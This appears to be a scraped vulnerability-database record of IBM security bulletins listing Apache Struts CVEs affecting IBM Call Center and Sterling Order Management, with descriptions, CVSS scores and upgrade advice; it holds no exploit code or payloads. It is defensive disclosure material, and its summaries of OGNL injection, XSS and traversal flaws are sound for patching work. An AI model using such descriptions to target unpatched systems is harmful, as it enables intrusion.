**[CVE-2014-7809](<https://vulners.com/cve/CVE-2014-7809>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by predictable tokens. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass cross-site request forgery security measures. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/98963](<https://exchange.xforce.ibmcloud.com/vulnerabilities/98963>) for the current score. 
\nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2011-5057](<https://vulners.com/cve/CVE-2011-5057>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to block access to the session map by the org.apache.struts2.interceptor.SessionAware or org.apache.struts2.interceptor.RequestAware interfaces. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to modify the session map. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/71654](<https://exchange.xforce.ibmcloud.com/vulnerabilities/71654>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-4387](<https://vulners.com/cve/CVE-2012-4387>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an error when handling request parameters. A remote attacker could exploit this vulnerability using a specially-crafted parameter name containing an OGNL expression to consume all available CPU resources. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/78183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/78183>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n \n** CVEID: **[CVE-2012-1006](<https://vulners.com/cve/CVE-2012-1006>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the editPerson.action and struts2-rest-showcase/orders scripts. A remote attacker could exploit this vulnerability using the name, lastName or clientNape parameter in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. 
\nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72888](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72888>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-0392](<https://vulners.com/cve/CVE-2012-0392>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the failure to properly restrict access to static methods by the CookieInterceptor class. An attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72088](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72088>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-0094](<https://vulners.com/cve/CVE-2014-0094>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in ParametersInterceptor. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92205](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92205>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2013-1965](<https://vulners.com/cve/CVE-2013-1965>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error in the Apache Struts Showcase App. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary code on the system. \nCVSS Base score: 6.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85573](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85573>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-0112](<https://vulners.com/cve/CVE-2014-0112>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to ParametersInterceptor and the failure to restrict access to the class parameter. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92740](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92740>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2134](<https://vulners.com/cve/CVE-2013-2134>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. 
\nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84762](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84762>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2016-3081](<https://vulners.com/cve/CVE-2016-3081>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the passing of a malicious expression when Dynamic Method Invocation is enabled. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 5.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/112528](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112528>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2014-0113](<https://vulners.com/cve/CVE-2014-0113>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to CookieInterceptor and the failure to restrict access to the getClass() method. An attacker could exploit this vulnerability using CookieInterceptor when configured to accept all cookies to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92742](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92742>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2135](<https://vulners.com/cve/CVE-2013-2135>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. 
An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84763](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84763>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2013-4316](<https://vulners.com/cve/CVE-2013-4316>) \n** DESCRIPTION: **An unspecified error in Apache Struts related to the default enabling of Dynamic Method Invocation (DMI) could lead to remote code execution. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/87373](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87373>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n** CVEID: **[CVE-2012-0391](<https://vulners.com/cve/CVE-2012-0391>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the interpretation of parameter values as OGNL expressions by the ExceptionDelegator command. An attacker could exploit this vulnerability using a specially-crafted parameter to execute arbitrary commands on the system. 
\nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72229](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72229>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2012-0393](<https://vulners.com/cve/CVE-2012-0393>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to traverse directories on the system, caused by the improper validation of input by ParameterInterceptor prior to being used to create files. An attacker could send a specially-crafted URL request containing directory traversal sequences to create or overwrite arbitrary files on the system. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72089](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72089>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-4386](<https://vulners.com/cve/CVE-2012-4386>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site request forgery, caused by improper validation of the token name configuration parameter by the token handling mechanism. By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to perform unauthorized actions. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/78182](<https://exchange.xforce.ibmcloud.com/vulnerabilities/78182>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2016-4003](<https://vulners.com/cve/CVE-2016-4003>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the URLDecoder implementation. 
A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/111514](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111514>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2016-3093](<https://vulners.com/cve/CVE-2016-3093>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by the improper implementation of cache used to store method references by the OGNL expression language. An attacker could exploit this vulnerability to block access to a Web site. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/113686](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113686>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2013-4310](<https://vulners.com/cve/CVE-2013-4310>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the action: parameter prefix. An attacker could exploit this vulnerability to gain unauthorized access to the system. \nCVSS Base score: 5.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/87336](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87336>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N) \n \n** CVEID: **[CVE-2014-0116](<https://vulners.com/cve/CVE-2014-0116>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to properly restrict access to the getClass() method by the CookieInterceptor class. 
An attacker could exploit this vulnerability to manipulate the ClassLoader used by the application server. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/93024](<https://exchange.xforce.ibmcloud.com/vulnerabilities/93024>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2010-1870](<https://vulners.com/cve/CVE-2010-1870>) \n** DESCRIPTION: **XWork, as used in Apache Struts, FishEye and Crucible, could allow a remote attacker to bypass security restrictions, caused by an error in the ParameterInterceptor class. An attacker could exploit this vulnerability using specially-crafted OGNL (Object-Graph Navigation Language) expressions to modify server-side objects and possibly execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/60371](<https://exchange.xforce.ibmcloud.com/vulnerabilities/60371>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2016-3082](<https://vulners.com/cve/CVE-2016-3082>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of XSLTResult to parse arbitrary stylesheet. 
An attacker could exploit this vulnerability to inject and execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/112527](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112527>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2016-4436](<https://vulners.com/cve/CVE-2016-4436>) \n** DESCRIPTION: **An unspecified error in Apache Struts related to the method used to clean up action name has an unknown impact and attack vector. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/114183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2013-2251](<https://vulners.com/cve/CVE-2013-2251>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating the action:, redirect:, and redirectAction: parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary commands on the system. Note: This vulnerability affects other products. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85756](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85756>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2017-12611](<https://vulners.com/cve/CVE-2017-12611>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of an unintentional expression in Freemarker tag instead of string literals. An attacker could exploit this vulnerability to execute arbitrary code on the system. 
\nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/131603](<https://exchange.xforce.ibmcloud.com/vulnerabilities/131603>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2015-5209](<https://vulners.com/cve/CVE-2015-5209>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to gain unauthorized access to the system. An attacker could exploit this vulnerability using a special top-level object to manipulate internal settings and modify another user session. \nCVSS Base score: 9.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106695](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106695>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) \n \n** CVEID: **[CVE-2013-2115](<https://vulners.com/cve/CVE-2013-2115>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an incomplete fix for an error related to the handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84543](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84543>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-1966](<https://vulners.com/cve/CVE-2013-1966>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restriction, caused by the improper handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject OGNL code on the system. 
\nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84542](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84542>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2248](<https://vulners.com/cve/CVE-2013-2248>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability in the DefaultActionMapper class. An attacker could exploit this vulnerability using the redirect: and redirectAction:: parameters in a specially-crafted URL to redirect a victim to arbitrary Web sites. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85755](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85755>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2015-2992](<https://vulners.com/cve/CVE-2015-2992>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when directly accessing JSP files. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106172](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106172>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2015-5169](<https://vulners.com/cve/CVE-2015-5169>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when debug mode is enabled. 
A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/105879](<https://exchange.xforce.ibmcloud.com/vulnerabilities/105879>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Call Center for Commerce| 9.5.0 \nIBM Call Center for Commerce| 10.0 \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading to the latest fixpack that has the upgraded version of Apache Struts. Please note the fixpack only applies to IBM Call Center version 10 and if you are running IBM Call Center version 9.5 a product upgrade must be completed first. 
IBM Call Center version 9.5 reached end of support April 30, 2022.\n\nCall Center installing Fix Pack 12 - <https://www.ibm.com/docs/en/call-center/10.0?topic=center-installing-fix-packs>\n\nFix Pack 12 download location - [https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=10.0.0.0-Sterling-ISCCS-All-fp12-Installer&product=ibm%2FOther%20software%2FIBM%20Call%20Center%20for%20Commerce&source=dbluesearch&mhsrc=ibmsearch_a&mhq=10.0.0.0-Sterling&function=fixId&parent=ibm/Other%20software](<https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=10.0.0.0-Sterling-ISCCS-All-fp12-Installer&product=ibm%2FOther%20software%2FIBM%20Call%20Center%20for%20Commerce&source=dbluesearch&mhsrc=ibmsearch_a&mhq=10.0.0.0-Sterling&function=fixId&parent=ibm/Other%20software>)\n\nIBM Call Center release notes - <https://www.ibm.com/docs/en/call-center/10.0?topic=center-fixes-by-fix-pack-version#fp12>\n\nCreating & Extending Struts - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=cesf-creating-extending-struts-xml-file-in-web-ui-framework>\n\n## Workarounds and Mitigations\n\nIBM strongly recommends addressing the vulnerability now by upgrading to the latest fixpack that has the upgraded version of Apache Struts. Please note the fixpack only applies to IBM Call Center version 10 and if you are running IBM Call Center version 9.5 a product upgrade must be completed first. 
IBM Call Center version 9.5 reached end of support April 30, 2022.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-14T17:37:56", "type": "ibm", "title": "Security Bulletin: IBM Call Center and Apache Struts Struts upgrade strategy (various CVEs, see below)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870", "CVE-2011-1772", "CVE-2011-5057", "CVE-2012-0391", "CVE-2012-0392", "CVE-2012-0393", "CVE-2012-0838", "CVE-2012-1006", "CVE-2012-4386", "CVE-2012-4387", "CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251", "CVE-2013-4310", "CVE-2013-4316", "CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113", "CVE-2014-0116", "CVE-2014-7809", "CVE-2015-2992", "CVE-2015-5169", "CVE-2015-5209", "CVE-2016-3081", "CVE-2016-3082", "CVE-2016-3093", "CVE-2016-4003", "CVE-2016-4436", "CVE-2017-12611", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530"], "modified": "2022-09-14T17:37:56", "id": "43ABDDEF8A51FB28FC8C4825BAD26A0A25F5F21805BFC87561A0AEABFD065F37", "href": "https://www.ibm.com/support/pages/node/6620351", "cvss": 
{"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-24T05:58:38", "description": "## Summary\n\nApache Struts is used by IBM Sterling Order Management as part of its web application framework used for creating Java EE web applications. We recommend upgrading to the latest supported version of Struts that was released as part of the latest FixPack 29.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2011-1772](<https://vulners.com/cve/CVE-2011-1772>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by Xwork when generating the action name for error pages. If Dynamic Method Invocation is enabled, a remote attacker could exploit this vulnerability using the tag in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/67354](<https://exchange.xforce.ibmcloud.com/vulnerabilities/67354>) for the current score. \nCVSS Vector: (AV:N/AC:H/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-0838](<https://vulners.com/cve/CVE-2012-0838>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the evaluation of an OGNL expression during a conversion error. An attacker could exploit this vulnerability using invalid input to a field to modify run-time data and execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/73690](<https://exchange.xforce.ibmcloud.com/vulnerabilities/73690>) for the current score. 
\nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-7809](<https://vulners.com/cve/CVE-2014-7809>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by predictable tokens. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass cross-site request forgery security measures. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/98963](<https://exchange.xforce.ibmcloud.com/vulnerabilities/98963>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2011-5057](<https://vulners.com/cve/CVE-2011-5057>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to block access to the session map by the org.apache.struts2.interceptor.SessionAware or org.apache.struts2.interceptor.RequestAware interfaces. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to modify the session map. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/71654](<https://exchange.xforce.ibmcloud.com/vulnerabilities/71654>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-4387](<https://vulners.com/cve/CVE-2012-4387>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an error when handling request parameters. A remote attacker could exploit this vulnerability using a specially-crafted parameter name containing an OGNL expression to consume all available CPU resources. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/78183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/78183>) for the current score. 
CVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)

**CVEID:** [CVE-2012-1006](<https://vulners.com/cve/CVE-2012-1006>)
**DESCRIPTION:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the editPerson.action and struts2-rest-showcase/orders scripts. A remote attacker could exploit this vulnerability using the name, lastName or clientNape parameter in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
CVSS Base score: 4.3
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/72888> for the current score.
CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)

**CVEID:** [CVE-2012-0392](<https://vulners.com/cve/CVE-2012-0392>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the failure to properly restrict access to static methods by the CookieInterceptor class. An attacker could exploit this vulnerability to execute arbitrary commands on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/72088> for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)

**CVEID:** [CVE-2014-0094](<https://vulners.com/cve/CVE-2014-0094>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in ParametersInterceptor. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server.
CVSS Base score: 5
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92205> for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N)

**CVEID:** [CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>)
**DESCRIPTION:** Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.
CVSS Base score: 5.9
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/186699> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)

